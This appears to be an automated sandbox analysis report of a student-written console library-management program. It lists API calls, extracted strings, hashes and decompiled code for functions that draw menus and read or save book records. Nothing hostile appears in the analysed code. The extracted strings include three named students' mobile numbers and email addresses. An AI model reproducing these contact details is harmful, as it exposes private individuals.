                                                  0x00b1a5cd
                                                  0x00b1a5d5
                                                  0x00b1a5ea
                                                  0x00b1a5f1
                                                  0x00b1a5f9
                                                  0x00b1a60e
                                                  0x00b1a615
                                                  0x00b1a61d
                                                  0x00b1a632
                                                  0x00b1a639
                                                  0x00b1a641
                                                  0x00b1a656
                                                  0x00b1a65d
                                                  0x00b1a678
                                                  0x00b1a680
                                                  0x00b1a695
                                                  0x00b1a697
                                                  0x00b1a69c
                                                  0x00b1a6a1
                                                  0x00b1a6a9
                                                  0x00b1a6ac
                                                  0x00b1a6af
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1a6b8
                                                  0x00b1a6cd
                                                  0x00b1a6cf
                                                  0x00b1a6d4
                                                  0x00b1a6d9
                                                  0x00b1a6dc
                                                  0x00b1a6e3
                                                  0x00000000
                                                  0x00b1a6e9
                                                  0x00b1a6ef
                                                  0x00b1a6ef
                                                  0x00000000
                                                  0x00b1a6e3
                                                  0x00b1a6b1
                                                  0x00000000
                                                  0x00b1a6f0
                                                  0x00b1a6f5
                                                  0x00b1a6f6
                                                  0x00b1a6f7
                                                  0x00b1a6f8
                                                  0x00b1a6fa
                                                  0x00b1a6fb
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1a6fc
                                                  0x00b1a701
                                                  0x00b1a702
                                                  0x00b1a703
                                                  0x00b1a704
                                                  0x00b1a706
                                                  0x00b1a707
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1a708
                                                  0x00b1a70d
                                                  0x00b1a70e
                                                  0x00b1a70f
                                                  0x00b1a710
                                                  0x00b1a712
                                                  0x00b1a713
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1a714
                                                  0x00b1a719
                                                  0x00b1a71a
                                                  0x00b1a71b
                                                  0x00b1a71c
                                                  0x00b1a71e
                                                  0x00b1a71f
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1a720
                                                  0x00b1a725
                                                  0x00b1a726
                                                  0x00b1a727
                                                  0x00b1a728
                                                  0x00b1a72a
                                                  0x00b1a72b
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1a72c
                                                  0x00b1a731
                                                  0x00b1a732
                                                  0x00b1a733
                                                  0x00b1a734
                                                  0x00b1a736
                                                  0x00b1a737
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1a738
                                                  0x00b1a73d
                                                  0x00b1a742
                                                  0x00b1a745
                                                  0x00b1a74f
                                                  0x00b1a755
                                                  0x00b1a75a
                                                  0x00b1a761
                                                  0x00b1a766
                                                  0x00b1a769
                                                  0x00b1a773
                                                  0x00b1a779
                                                  0x00b1a77e
                                                  0x00b1a785
                                                  0x00b1a78a
                                                  0x00b1a78d
                                                  0x00b1a797
                                                  0x00b1a79d
                                                  0x00b1a7a2
                                                  0x00b1a7a9
                                                  0x00b1a7ae
                                                  0x00b1a7b1
                                                  0x00b1a7bb
                                                  0x00b1a7c1
                                                  0x00b1a7c6
                                                  0x00b1a7cd
                                                  0x00b1a7d2
                                                  0x00b1a7d5
                                                  0x00b1a7df
                                                  0x00b1a7e5
                                                  0x00b1a7ea
                                                  0x00b1a7f1
                                                  0x00b1a7f6
                                                  0x00b1a7f9
                                                  0x00b1a803
                                                  0x00b1a809
                                                  0x00b1a80e
                                                  0x00b1a815
                                                  0x00b1a81a
                                                  0x00b1a81d
                                                  0x00b1a827
                                                  0x00b1a82d
                                                  0x00b1a832
                                                  0x00b1a839
                                                  0x00b1a83e
                                                  0x00b1a841
                                                  0x00b1a84b
                                                  0x00b1a851
                                                  0x00b1a856
                                                  0x00b1a85d
                                                  0x00b1a862
                                                  0x00b1a865
                                                  0x00b1a86f
                                                  0x00b1a875
                                                  0x00b1a87a
                                                  0x00b1a881
                                                  0x00b1a886
                                                  0x00b1a88e
                                                  0x00b1a88e
                                                  0x00b1a894
                                                  0x00b1a894
                                                  0x00b1a899
                                                  0x00b1a899
                                                  0x00b1a89f
                                                  0x00b1a8a4
                                                  0x00b1a8a8
                                                  0x00b1a8a9
                                                  0x00b1a8ac
                                                  0x00b1a8b4
                                                  0x00b1a8bc
                                                  0x00b1a8c0
                                                  0x00b1a8ca
                                                  0x00b1a8ca
                                                  0x00b1a8cc
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,00B17DEB), ref: 00B1A50F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,00B17DEB), ref: 00B1A512
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B17DEB), ref: 00B1A533
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,00B17DEB), ref: 00B1A536
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,00B17DEB), ref: 00B1A557
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,00B17DEB), ref: 00B1A55A
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,00B17DEB), ref: 00B1A57B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,00B17DEB), ref: 00B1A57E
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A59F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5A2
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5C3
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5C6
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5E7
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5EA
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A60B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A60E
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A62F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A632
                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A653
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A656
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A692
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A695
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A6CA
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A6CD
                                                  Strings
                                                  • 3. Sijan Bhandari (066/BCT/537), xrefs: 00B1A810
                                                  • Mobile:9846311430 E-mail:subedi_bibek@yahoo.co.in, xrefs: 00B1A7A4
                                                  • cls, xrefs: 00B1A4F0, 00B1A738
                                                  • Exiting in 3 second...........>, xrefs: 00B1A87C
                                                  • 2. Dinesh Subedi (066/BCT/512), xrefs: 00B1A7C8
                                                  • Mobile:9849516774 E-mail:sijan_nasa@yahoo.com, xrefs: 00B1A834
                                                  • Date and time:%s, xrefs: 00B1A673
                                                  • Mobile:9841569394 E-mail:smokindinesh@gmail.com, xrefs: 00B1A7EC
                                                  • 1. Bibek Subedi (066/BCT/506), xrefs: 00B1A780
                                                  • With the Unexplainable Help of Mr.Ashok Basnet, xrefs: 00B1A858
                                                  • Enter your choice:, xrefs: 00B1A697
                                                  • Programmers...., xrefs: 00B1A75C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition
                                                  • String ID: Mobile:9841569394 E-mail:smokindinesh@gmail.com$ Mobile:9846311430 E-mail:subedi_bibek@yahoo.co.in$ Mobile:9849516774 E-mail:sijan_nasa@yahoo.com$1. Bibek Subedi (066/BCT/506)$2. Dinesh Subedi (066/BCT/512)$3. Sijan Bhandari (066/BCT/537)$Date and time:%s$Enter your choice:$Exiting in 3 second...........>$Programmers....$With the Unexplainable Help of Mr.Ashok Basnet$cls
                                                  • API String ID: 4283984680-75408317
                                                  • Opcode ID: ed741d8e62f782acc9a0fbd654110f38e1e0879c409bead3187e9dafe6f98cde
                                                  • Instruction ID: 6b24c774fa37f340d4d5185efd937196b7015881e102e231ec6e65cd68ce81c5
                                                  • Opcode Fuzzy Hash: ed741d8e62f782acc9a0fbd654110f38e1e0879c409bead3187e9dafe6f98cde
                                                  • Instruction Fuzzy Hash: 4C81F9B2C4919876CA30B7E6BC0AD8A3E4CDB48374B1542A5F528427F2DEB16454CFB7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B18930, Relevance: 54.4, APIs: 24, Strings: 7, Instructions: 181COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E00B18930(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t10;
				void* _t17;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				short _t60;
				void* _t62;
				void* _t63;
				signed int _t65;
				void* _t67;
				void* _t71;

				_t61 = __edx;
				_t59 = __ecx;
				_t64 = 0;
				_v12 = 0;
				E00AE3965(_t57, __edx, _t62, 0);
				_t63 = GetStdHandle;
				0xb27e6c->X = 0x10001;
				_t10 = GetStdHandle(0xfffffff5);
				_t58 = SetConsoleCursorPosition;
				SetConsoleCursorPosition(_t10, 0xb27e6c->X);
				E00AD1080(_t59, "*********************************Book List*****************************", "cls");
				0xb27e6c->X = 0x20002;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				_push(" CATEGORY     ID    BOOK NAME     AUTHOR       QTY     PRICE     RackNo ");
				E00AD1080(_t59);
				_v8 = 4;
				 *0xb27ea0 = L00AD9D57("Bibek.dat", "rb");
				_t17 = E00AF1525(0xb27ec0, 0x6c, 1, _t16);
				_t71 = _t67 + 0x24;
				_t3 = _t64 + 3; // 0x3
				_t60 = _t3;
				if(_t17 == 1) {
					do {
						_t65 = _v8 & 0x0000ffff;
						0xb27e6c->X = _t60;
						 *0xb27e6e = _t65;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t60, "%s",  *0xb27f10);
						 *0xb27e6e = _t65;
						0xb27e6c->X = 0x10;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t60, 0xb22be0,  *0xb27ec0);
						 *0xb27e6e = _t65;
						0xb27e6c->X = 0x16;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t60, "%s", 0xb27ed8);
						 *0xb27e6e = _t65;
						0xb27e6c->X = 0x24;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t60, "%s", 0xb27eec);
						 *0xb27e6e = _t65;
						0xb27e6c->X = 0x32;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t60, 0xb22be0,  *0xb27f00);
						 *0xb27e6e = _t65;
						0xb27e6c->X = 0x39;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						asm("movss xmm0, [0xb27f04]");
						asm("cvtps2pd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						E00AD1080(_t60);
						 *0xb27e6e = _t65;
						0xb27e6c->X = 0x45;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
						E00AD1080(_t60, 0xb22be0,  *0xb27f0c);
						E00AD1080(_t60, "\n\n", "%.2f");
						_t64 = _v12 +  *0xb27f00;
						_v8 = _v8 + 1;
						_v12 = _v12 +  *0xb27f00;
						_t56 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27ea0);
						_t71 = _t71 + 0x28 - 8 + 0x28;
						_t60 = 3;
						_t84 = _t56 - 1;
					} while (_t56 == 1);
				}
				0xb27e6c->X = 0x190003;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t60, "Total Books =%d", _t64);
				E00ADA516(_t60, _t61, _t84);
				0xb27e6c->X = 0x190023;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
				E00AD1080(_t60, " Press ENTER to return to main menu",  *0xb27ea0);
				do {
				} while (E00AF4817(_t61, _t64, _t84) != 0xd);
				return E00B1A4D0(_t58, _t60, _t61, _t63, _t64);
			}





















                                                  0x00b18930
                                                  0x00b18930
                                                  0x00b18939
                                                  0x00b18940
                                                  0x00b18943
                                                  0x00b18948
                                                  0x00b18951
                                                  0x00b18963
                                                  0x00b18965
                                                  0x00b1896c
                                                  0x00b18973
                                                  0x00b1897b
                                                  0x00b18990
                                                  0x00b18992
                                                  0x00b18997
                                                  0x00b1899f
                                                  0x00b189bf
                                                  0x00b189c4
                                                  0x00b189c9
                                                  0x00b189cc
                                                  0x00b189cc
                                                  0x00b189d2
                                                  0x00b189e0
                                                  0x00b189e3
                                                  0x00b189e6
                                                  0x00b189ed
                                                  0x00b189ff
                                                  0x00b18a0c
                                                  0x00b18a14
                                                  0x00b18a20
                                                  0x00b18a31
                                                  0x00b18a3e
                                                  0x00b18a46
                                                  0x00b18a52
                                                  0x00b18a63
                                                  0x00b18a6f
                                                  0x00b18a77
                                                  0x00b18a83
                                                  0x00b18a94
                                                  0x00b18aa0
                                                  0x00b18aa8
                                                  0x00b18ab4
                                                  0x00b18ac5
                                                  0x00b18ad2
                                                  0x00b18ada
                                                  0x00b18ae6
                                                  0x00b18af7
                                                  0x00b18af9
                                                  0x00b18b04
                                                  0x00b18b07
                                                  0x00b18b11
                                                  0x00b18b19
                                                  0x00b18b25
                                                  0x00b18b36
                                                  0x00b18b43
                                                  0x00b18b4d
                                                  0x00b18b58
                                                  0x00b18b5e
                                                  0x00b18b61
                                                  0x00b18b73
                                                  0x00b18b78
                                                  0x00b18b7b
                                                  0x00b18b80
                                                  0x00b18b80
                                                  0x00b189e0
                                                  0x00b18b89
                                                  0x00b18b9e
                                                  0x00b18ba6
                                                  0x00b18bb1
                                                  0x00b18bb9
                                                  0x00b18bce
                                                  0x00b18bd5
                                                  0x00b18be0
                                                  0x00b18be5
                                                  0x00b18bf5

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18963
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1896C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1898D
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18990
                                                  • __fread_nolock.LIBCMT ref: 00B189C4
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B189FC
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B189FF
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18A2E
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18A31
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18A60
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18A63
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18A91
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18A94
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18AC2
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18AC5
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18AF4
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18AF7
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18B33
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18B36
                                                  • __fread_nolock.LIBCMT ref: 00B18B73
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18B9B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18B9E
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18BCB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18BCE
                                                  Strings
                                                  • *********************************Book List*****************************, xrefs: 00B1896E
                                                  • Press ENTER to return to main menu, xrefs: 00B18BD0
                                                  • Bibek.dat, xrefs: 00B189AB
                                                  • cls, xrefs: 00B1893B
                                                  • %.2f, xrefs: 00B18B0C
                                                  • Total Books =%d, xrefs: 00B18BA1
                                                  • CATEGORY ID BOOK NAME AUTHOR QTY PRICE RackNo , xrefs: 00B18992
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: CATEGORY ID BOOK NAME AUTHOR QTY PRICE RackNo $ Press ENTER to return to main menu$%.2f$*********************************Book List*****************************$Bibek.dat$Total Books =%d$cls
                                                  • API String ID: 2024444707-2547792454
                                                  • Opcode ID: a5e89be075d471575457707b37ed203e8c388792e6c7796d58ef6a81041e1fea
                                                  • Instruction ID: 381f15d9218ae83868b17d0015f0af21ba1df3910d7ed210fd4280c97ad991ec
                                                  • Opcode Fuzzy Hash: a5e89be075d471575457707b37ed203e8c388792e6c7796d58ef6a81041e1fea
                                                  • Instruction Fuzzy Hash: FD510372888294BACB20BBE1FC06DAA3A6CEF48750F554285F114533F1DEB15D41CB7A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B1A230, Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00B1A230(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t35;
				void* _t36;
				void* _t51;
				signed int _t53;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t70;
				void* _t72;

				_t55 = __edx;
				_t52 = __ecx;
				_t57 = SetConsoleCursorPosition;
				_t56 = GetStdHandle;
				while(1) {
					E00AE3965(_t51, _t55, _t56, _t57);
					0xb27e6c->X = 0x50014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t52, 0xb22b20, "cls");
					0xb27e6c->X = 0x70014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t52);
					0xb27e6c->X = 0x90014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t52, 0xb22b5c, 0xb22b48);
					0xb27e6c->X = 0xb0014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t52);
					0xb27e6c->X = 0xd0014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t52, 0xb22b88, 0xb22b74);
					0xb27e6c->X = 0xf0014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t52);
					0xb27e6c->X = 0x110014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t52, 0xb22bac, 0xb22b98);
					0xb27e6c->X = 0x130014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t52);
					0xb27e6c->X = 0x150014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080(_t52, 0xb22944, 0xb22bc4);
					0xb27e6c->X = 0x160014;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					_push("Enter your choice:");
					E00AD1080(_t52);
					E00AD10F0(_t52, 0xb22be0, 0xb27f30);
					_t70 = _t58 + 0x34;
					_t77 =  *0xb27f30 - 7;
					if( *0xb27f30 == 7) {
						E00B1A4D0(_t51, _t52, _t55, _t56, _t57);
					}
					_push("cls");
					E00AE3965(_t51, _t55, _t56, _t57);
					_t35 = L00AD9D57("Bibek.dat", "ab+");
					_t72 = _t70 + 0xc;
					 *0xb27ea0 = _t35;
					_t36 = E00B18050(_t52, _t55, _t77);
					_t78 = _t36 - 1;
					if(_t36 != 1) {
						break;
					}
					_t53 =  *0xb27f30; // 0x0
					_t1 = (_t53 << 4) -  *0xb27f30 + 0xb26941; // -5615
					 *0xb27f10 = _t1;
					E00ADA900(_t55,  *0xb27ea0, 0, 2);
					L00AE3D2F(0xb27ec0, 0x6c, 1,  *0xb27ea0);
					E00ADA516((_t53 << 4) -  *0xb27f30, _t55, _t78);
					0xb27e6c->X = 0xe0015;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
					E00AD1080((_t53 << 4) -  *0xb27f30, "The record is sucessfully saved",  *0xb27ea0);
					0xb27e6c->X = 0xf0015;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
					_push("Save any more?(Y / N):");
					E00AD1080(_t52);
					_t58 = _t72 + 0x28;
					if(E00AF4817(_t55, _t57, _t78) != 0x6e) {
						_push("cls");
						E00AE3965(_t51, _t55, _t56, _t57);
						_t58 = _t58 + 4;
					} else {
						E00B1A4D0(_t51, _t52, _t55, _t56, _t57);
					}
				}
				return _t36;
			}
















                                                  0x00b1a230
                                                  0x00b1a230
                                                  0x00b1a232
                                                  0x00b1a239
                                                  0x00b1a240
                                                  0x00b1a245
                                                  0x00b1a24d
                                                  0x00b1a262
                                                  0x00b1a269
                                                  0x00b1a271
                                                  0x00b1a286
                                                  0x00b1a28d
                                                  0x00b1a295
                                                  0x00b1a2aa
                                                  0x00b1a2b1
                                                  0x00b1a2b9
                                                  0x00b1a2ce
                                                  0x00b1a2d5
                                                  0x00b1a2dd
                                                  0x00b1a2f2
                                                  0x00b1a2f9
                                                  0x00b1a301
                                                  0x00b1a316
                                                  0x00b1a31d
                                                  0x00b1a325
                                                  0x00b1a33a
                                                  0x00b1a341
                                                  0x00b1a349
                                                  0x00b1a35e
                                                  0x00b1a365
                                                  0x00b1a36d
                                                  0x00b1a382
                                                  0x00b1a389
                                                  0x00b1a391
                                                  0x00b1a3a6
                                                  0x00b1a3a8
                                                  0x00b1a3ad
                                                  0x00b1a3bf
                                                  0x00b1a3c4
                                                  0x00b1a3c7
                                                  0x00b1a3ce
                                                  0x00b1a3d0
                                                  0x00b1a3d0
                                                  0x00b1a3d5
                                                  0x00b1a3da
                                                  0x00b1a3ec
                                                  0x00b1a3f1
                                                  0x00b1a3f4
                                                  0x00b1a3f9
                                                  0x00b1a3fe
                                                  0x00b1a401
                                                  0x00000000
                                                  0x00000000
                                                  0x00b1a407
                                                  0x00b1a420
                                                  0x00b1a426
                                                  0x00b1a42b
                                                  0x00b1a442
                                                  0x00b1a44d
                                                  0x00b1a455
                                                  0x00b1a46a
                                                  0x00b1a471
                                                  0x00b1a479
                                                  0x00b1a48e
                                                  0x00b1a490
                                                  0x00b1a495
                                                  0x00b1a49a
                                                  0x00b1a4a5
                                                  0x00b1a4b1
                                                  0x00b1a4b6
                                                  0x00b1a4bb
                                                  0x00b1a4a7
                                                  0x00b1a4a7
                                                  0x00b1a4a7
                                                  0x00b1a4a5
                                                  0x00b1a4c6

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00B1A6F5), ref: 00B1A25F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A262
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A283
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A286
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A2A7
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A2AA
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A2CB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A2CE
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A2EF
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A2F2
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A313
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A316
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A337
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A33A
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A35B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A35E
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A37F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A382
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A3A3
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A3A6
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A467
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A46A
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1A48B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1A48E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition
                                                  • String ID: Bibek.dat$Enter your choice:$Save any more?(Y / N):$The record is sucessfully saved$ab+$cls
                                                  • API String ID: 4283984680-3392312719
                                                  • Opcode ID: d15429008446e644eba52114a514e548b2e0bc770887e138c4fb537cbfda184e
                                                  • Instruction ID: 863c7ce785f543cce6ae342447c71ff1aae4579156e235612e4fdd408cb8274a
                                                  • Opcode Fuzzy Hash: d15429008446e644eba52114a514e548b2e0bc770887e138c4fb537cbfda184e
                                                  • Instruction Fuzzy Hash: CE51F8B1C8929476CA30BBE1BD0ED8A3E58DB48368B014291F119533F2DEB16445DFB7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFE67B, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 202processsynchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00AFE67B(void* __ebx, signed int __edi, void* __esi, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				void* _v20;
				long _v24;
				long _v28;
				struct _PROCESS_INFORMATION _v44;
				struct _STARTUPINFOW _v112;
				intOrPtr* _v116;
				intOrPtr* _v120;
				intOrPtr* _v124;
				signed int _t67;
				intOrPtr* _t73;
				int _t81;
				intOrPtr _t82;
				void* _t92;
				long _t117;
				void* _t118;
				long _t124;
				void* _t129;

				if(_a8 == 0) {
					L1:
					 *((intOrPtr*)(E00AF69E3())) = 0x16;
					return E00AF68BC() | 0xffffffff;
				}
				if(_a12 == 0) {
					goto L1;
				}
				if(_a4 > 4) {
					 *(E00AF69D0()) =  *_t114 & 0x00000000;
					goto L1;
				}
				_push(__ebx);
				_push(__edi);
				_v16 = 0;
				_v8 = 0;
				_t67 = E00B0D02C(0, __edi, _a12, _a16,  &_v16,  &_v8);
				_t124 = __edi | 0xffffffff;
				if(_t67 == _t124) {
					L00AF4D62(_v8);
					_v8 = 0;
					L00AF4D62(_v16);
					L9:
					_t92 = _t124;
					L35:
					return _t92;
				}
				_v12 = 0;
				if(E00AFEAB6( &_v12,  &_v20, (_t67 & 0xffffff00 | _a4 != 0x00000004) & 0x000000ff) == 0) {
					L00AF4D62(_v12);
					_v12 = 0;
					L00AF4D62(_v8);
					_v8 = 0;
					L00AF4D62(_v16);
					goto L9;
				}
				if(_a4 == 4) {
					_push(8);
					_pop(0);
				}
				_t73 = E00AF69D0();
				 *_t73 = 0;
				_t117 = 0x44;
				E00AD24C0(_t124,  &_v112, 0, _t117);
				_v112.cbReserved2 = _v20;
				_v112.lpReserved2 = _v12;
				_v112.cb = _t117;
				_t81 = CreateProcessW(_a8, _v16, 0, 0, 1, 0x400, _v8, 0,  &_v112,  &_v44);
				_t118 = _v44.hProcess;
				_t129 = _v44.hThread;
				if(_t81 == 0) {
